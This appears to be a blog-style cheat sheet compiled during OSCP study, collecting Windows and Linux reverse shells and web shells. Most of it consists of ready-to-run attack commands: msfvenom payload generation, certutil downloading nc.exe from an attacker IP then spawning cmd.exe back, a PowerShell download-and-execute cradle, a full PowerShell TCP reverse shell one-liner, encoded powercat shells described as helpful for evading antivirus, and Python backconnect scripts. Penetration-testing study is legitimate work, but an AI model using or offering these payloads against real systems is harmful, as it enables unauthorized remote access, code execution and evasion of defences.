Windows and Linux shells repository
While doing OSCP i spent a lot of time looking for suitable reverse shells and web shells, i needed a repository for keeping all the shells i can use in one place.
Before we start, there is this amazing repository in pentester monkey, make sure to check it out.
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
WEB SHELLS
This GitHub project is an amazing source for web-shells, and the good thing about it that it is continuously updated.
- IIS exploits:
msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f aspx > shell.aspxmsfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f asp > shell.asp
- Using certutil.exe: (already installed in windows)
This method can be helpful if you have an RCE using a webshell and you need to have a full RCE on the machiene:
cmd=certutil.exe -urlcache -f http://192.168.49.142/nc.exe C:\Users\apache\Documents\nc.exe
cmd=C:\Users\apache\Documents\nc.exe -e cmd.exe 192.168.49.142 443- PHP web-shell
This an amazing and very stable php reverse shell from pentestmonkey.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Windows payloads
- Meterpreter payloads
-- staged[x86] --
windows/exec
windows/meterpreter/reverse_http
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp-- non-staged[x86] --
windows/powershell_reverse_tcp
windows/powershell_bind_tcp
windows/meterpreter_reverse_tcp
windows/meterpreter_reverse_http
windows/meterpreter_bind_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp-- staged[x64] --
windows/x64/exec
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp-- Non-staged[x64] --
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_http
windows/x64/meterpreter_reverse_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
- Powershell Paylaods
powershell -c iex(new-object net.webclient).downloadstring('http://0.0.0.0/Invoke-PowerShellTcp.ps1')You can use the above payloads to run anything in the background on the target machine. Some exploit you can run:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('0.0.0.0',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"- Encoded shell (helpful for AV)
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1powershell.exe <the content of encodedreverseshell.ps1>
- mkpsrevshell
This is a simple but very effective reverse shell, i used it plenty of time in windows machines.
To use the above script, you need to downoad it and then update the IP and the port number below:
python3 mkpsrevshell.py 10.10.10.10 443
As seen above the output of the script is an encoded reverse shell ready to be used directly on the target (windows) machiene. Copy the whole output and pasete it there as shown below
start a nc on your kali, and when running the above script it that should give you a reverse shell
Linux payloads
- Meterpreter payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > shell.elf[x86 Payloads]linux/x86/meterpreter/bind_tcp
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/reverse_http
linux/x86/meterpreter_reverse_http
linux/x86/meterpreter_reverse_tcp
linux/x86/meterpreter_bind_tcp
linux/x86/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell/bind_tcp[x64 Payloads]linux/x64/meterpreter/bind_tcp
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_http
linux/x64/meterpreter_reverse_http
linux/x64/meterpreter_reverse_tcp
linux/x64/meterpreter_bind_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell/bind_tcp
Python shells [can work for Lin only]
In the target -Linux- machiene:
Download tcp_pty_backconnect.py script in the target machiene, then edit the (host / port) then run the script:
Then you should run the script
python tcp_pty_backconnect.py- In the attacking machine - Kali:
Download tcp_pty_shell_handler.py script then run it using the below syntax:
Note: You need to run tcp_pty_backconnect.py in the target before starting the below handler.
python tcp_pty_shell_handler.py -b 192.168.201.37:80
There are other scripts you can try in the above repository, such as UDP and bind reverse shell.
Finally, this repositry is not meant to be a compelte, feel free to comment out your favorite reverse shell to use, and keep looking for new and awesome $h333llss!
